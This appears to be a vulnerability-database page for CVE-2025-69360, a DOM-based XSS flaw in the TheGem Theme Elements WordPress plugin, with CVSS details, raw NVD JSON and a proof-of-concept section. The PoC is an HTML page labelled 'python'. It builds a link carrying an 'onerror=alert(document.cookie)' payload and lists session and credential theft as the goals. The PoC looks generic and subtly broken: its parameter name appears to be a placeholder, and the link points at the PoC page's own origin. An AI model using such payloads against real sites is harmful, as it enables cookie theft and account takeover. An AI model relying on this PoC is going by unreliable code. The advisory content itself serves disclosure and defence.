Security Vulnerability Report
中文
CVE-2025-69360 CVSS 6.5 MEDIUM

CVE-2025-69360

Published: 2026-01-06 17:15:49
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for WPBakery) thegem-elements allows DOM-Based XSS.This issue affects TheGem Theme Elements (for WPBakery): from n/a through <= 5.11.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TheGem Theme Elements (for WPBakery) <= 5.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69360 DOM-Based XSS PoC --> <!-- Target: WordPress with TheGem Theme Elements plugin <= 5.11.0 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-69360 PoC</title> </head> <body> <h1>DOM-Based XSS PoC for CVE-2025-69360</h1> <p>The following link demonstrates the vulnerability in TheGem Theme Elements plugin:</p> <script> // Generate malicious URL with XSS payload function generatePocUrl() { // Payload: <img src=x onerror=alert(document.cookie)> // This payload is commonly used to bypass basic filters const baseUrl = window.location.origin + window.location.pathname; const payload = '<img src=x onerror=alert(document.cookie)>'; const maliciousUrl = baseUrl + '?thegem_param=' + encodeURIComponent(payload); document.getElementById('poc-link').href = maliciousUrl; document.getElementById('poc-link').textContent = maliciousUrl; document.getElementById('url-display').textContent = 'Copy and paste this URL into a browser with TheGem Theme Elements installed:'; } generatePocUrl(); </script> <div id="url-display"></div> <a id="poc-link" href="#" target="_blank">Generating URL...</a> <h2>Attack Scenario:</h2> <ol> <li>Attacker crafts a malicious URL containing XSS payload in parameter</li> <li>Victim clicks the link or visits the page</li> <li>TheGem Theme Elements JavaScript processes the parameter without sanitization</li> <li>Malicious script executes in victim's browser context</li> <li>Attacker can steal cookies, session tokens, or perform actions as the victim</li> </ol> <h2>Impact:</h2> <ul> <li>Session hijacking</li> <li>Credential theft</li> <li>Malware distribution</li> <li>Website defacement</li> </ul> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69360", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:48.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for WPBakery) thegem-elements allows DOM-Based XSS.This issue affects TheGem Theme Elements (for WPBakery): from n/a through <= 5.11.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/thegem-elements/vulnerability/wordpress-thegem-theme-elements-for-wpbakery-plugin-5-11-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}